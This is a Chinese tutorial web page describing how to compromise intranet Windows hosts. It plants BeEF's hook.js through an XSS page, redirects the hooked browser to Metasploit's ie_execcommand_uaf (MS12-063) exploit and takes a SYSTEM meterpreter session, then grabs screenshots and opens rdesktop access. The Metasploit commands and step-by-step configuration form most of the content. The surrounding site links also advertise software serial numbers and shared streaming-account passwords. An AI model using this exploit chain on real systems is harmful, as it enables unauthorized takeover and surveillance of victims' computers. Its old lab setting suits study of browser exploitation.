- 1PS提示:因?yàn)閳D層已鎖定,無法編輯圖層的處理方法
- 2picacg蘋果版怎么找不到|picacg ios版是不是下架了介紹
- 3Adobe Illustrator CS5 序列號大全
- 4ACDsee注冊碼免費(fèi)分享(含ACDsee18、ACDsee10等版本)
- 5PDF瀏覽器能看3D文件嗎?PDF瀏覽器看3D文件圖文詳細(xì)教程
- 6Potato(馬鈴薯聊天)怎么注冊不了|Potato不能注冊處理方法介紹
- 7Potato(土豆聊天)怎么換頭像|Potato app更改頭像方法介紹
- 8最新的Adobe Illustrator CS4序列號大全
- 9qq郵件是否已讀怎么看 QQ郵箱已經(jīng)發(fā)出去的郵件怎么知道對方是否已經(jīng)查看
- 10Intel i7-9700K性能跑分曝光:同代提升約12%
- 11AMD推土機(jī)架構(gòu)回顧:雖隕落卻是Zen成功的墊腳石
- 12美國增加25%進(jìn)口關(guān)稅!PC硬件要大漲價(jià)
聊天工具辦公軟件殺毒教程系統(tǒng)工具圖形圖像電腦學(xué)習(xí)應(yīng)用軟件網(wǎng)絡(luò)軟件蘋果應(yīng)用注冊碼網(wǎng)站教程技術(shù)開發(fā)安卓教程其它教程
您當(dāng)前所在位置:網(wǎng)視手游站 -> 殺毒教程 -> metasploit使用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)
metasploit使用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)
發(fā)表時(shí)間:2023-09-10 來源:明輝站整理相關(guān)軟件相關(guān)文章人氣:
[摘要]系統(tǒng):KALI 用到的工具:beEF+msf 利用的IE漏洞是:http://www.rapid7.com/db/modules/exploit/windows/browser/ie_execcommand_uaf MS12-063 AutomaticIE 7 on Windows XP SP3...
系統(tǒng):KALI
用到的工具:beEF+msf
利用的IE漏洞是:http://www.rapid7.com/db/modules/exploit/windows/browser/ie_execcommand_uaf
MS12-063
AutomaticIE 7 on Windows XP SP3IE 8 on Windows XP SP3IE 7 on Windows VistaIE 8 on Windows VistaIE 8 on Windows 7IE 9 on Windows 7
用到的beef+msf
先配置下:
root@kali:~# cd /usr/share/beef-xss/root@kali:/usr/share/beef-xss# lsbeef beef_key.pem config.yaml db Gemfile modulesbeef_cert.pem bundle core extensions Gemfile.lock
編輯下config.yaml
把metasploit :false改成true
再進(jìn)入extensions/metasploit/
同樣修改下config.yaml
把host跟callback_host 改成自己的IP 這里是220.128
再改動下custom path:
這樣beef已經(jīng)配置好了。那就運(yùn)行下metasploit
運(yùn)行msf后 數(shù)據(jù)庫連接下,不然上線也會沒有提示的。這里的pass 就是extensions/metasploit/config.yaml里面的pass
這樣就沒有什么問題。我們可以先看一下beef.數(shù)據(jù)庫只要連上了就不會出現(xiàn)msf的api錯(cuò)誤的。
進(jìn)入beef
賬號密碼beef 配置文件里面有。beef:beef
那beef已經(jīng)都OK了。
現(xiàn)在來搞下選擇下要顯示的頁面:
hook.js 運(yùn)行beef 顯示出來的。
別忘記運(yùn)行下apache。
我們再進(jìn)入msf
use exploit/windows/browser/ie_execcommand_uaf
可以自己根據(jù)自己的要求來選擇。
show options
port可以自已改。
我用xp+ie7
直接訪問下我們的頁面192.168.220.128/xss/
beef就會顯示出來了。
點(diǎn)擊 commands-hookeddomain-REDIRECT BROWSER 讓他重新跳轉(zhuǎn)到我們msf生成的地址上。beef很多功能。
把地址改成192.168.220.128:8080(msf生成的地址)
我們就會看到msf上面已經(jīng)顯示出來了。 回顯了sessions
payload可以自己去改。我使用的meterpreter載荷
執(zhí)行sessions -i
執(zhí)行sessions -i ID號
可以執(zhí)行任意命令已經(jīng)是系統(tǒng)權(quán)限
執(zhí)行下screenshost
meterpreter > screenshot Screenshot saved to: /root/dlsSQBkF.jpeg
就可以看到當(dāng)前主機(jī)的屏幕內(nèi)容。
也可以rdesktop 遠(yuǎn)程連接上去。
參數(shù)rdesktop -f ip -u username -p password
這也是一種xss掛馬拿內(nèi)網(wǎng)主機(jī)。
注:鄙人每天都在寫一些metasploit的玩法,如果有大神有什么好的方法希望告訴我,我更新在空間,分享給大家。
上面是電腦上網(wǎng)安全的一些基礎(chǔ)常識,學(xué)習(xí)了安全知識,幾乎可以讓你免費(fèi)電腦中毒的煩擾。
推薦資訊 總?cè)藲獍?/span>
最新教程 本月人氣
- 1小米miui8支持機(jī)型有哪一些 小米miui8支持什么機(jī)型
- 2華為g9青春版如何設(shè)置指紋識別 華為g9青春版指紋解鎖設(shè)置方法
- 3華為榮耀5c如何打開后蓋 華為榮耀暢玩5c后蓋打開圖文說明教程
- 43星galaxy s7active上市時(shí)間 3星s7active什么時(shí)候上市
- 53星s7active設(shè)置如何 3星galaxy s7active參數(shù)設(shè)置
- 6華為榮耀v8與榮耀8比較評測 華為榮耀8與華為榮耀v8哪一個(gè)好
- 7小米max與華為榮耀v8哪一個(gè)好 華為榮耀v8與小米max比較評測
- 8愛鬧直播下載網(wǎng)址 愛鬧直播app下載地址
- 9樂視2如何打開usb調(diào)試 樂視2打開usb調(diào)試模式圖文說明教程
- 10華為mate7如何免解鎖root 華為mate7免解鎖root方法流程
- 11華為平板m2攬閱如何 華為平板m2攬閱青春版評測
- 12華為攬閱m2青春版價(jià)格 華為攬閱m2平板多少錢
- 1詳細(xì)說明MySQL5.7中的關(guān)鍵字與保留字
- 2鬼怪大結(jié)局是什么?韓劇《鬼怪》大結(jié)局第16集視頻鏈接
- 3聯(lián)想zuk z2開發(fā)者模式如何開 聯(lián)想zuk z2開發(fā)者模式打開圖文說明教程
- 4用PS如何將照片背景換成藍(lán)色
- 5知道sql語句中where與having的區(qū)別
- 6mysql event事件調(diào)度器的圖文代碼詳細(xì)說明
- 7QQ影音如何截取QQ表情?QQ影音截取QQ表情圖文說明教程
- 8QQ影音如何播放3D視頻?QQ影音播放3D視頻設(shè)置技巧
- 9最新愛奇藝會員賬號密碼大全(2017.2.20)
- 10QQ影音如何轉(zhuǎn)換視頻格式?
- 11最新愛奇藝vip會員賬號免費(fèi)共享(2017年2月)
- 12qq影音如何慢放與加速?
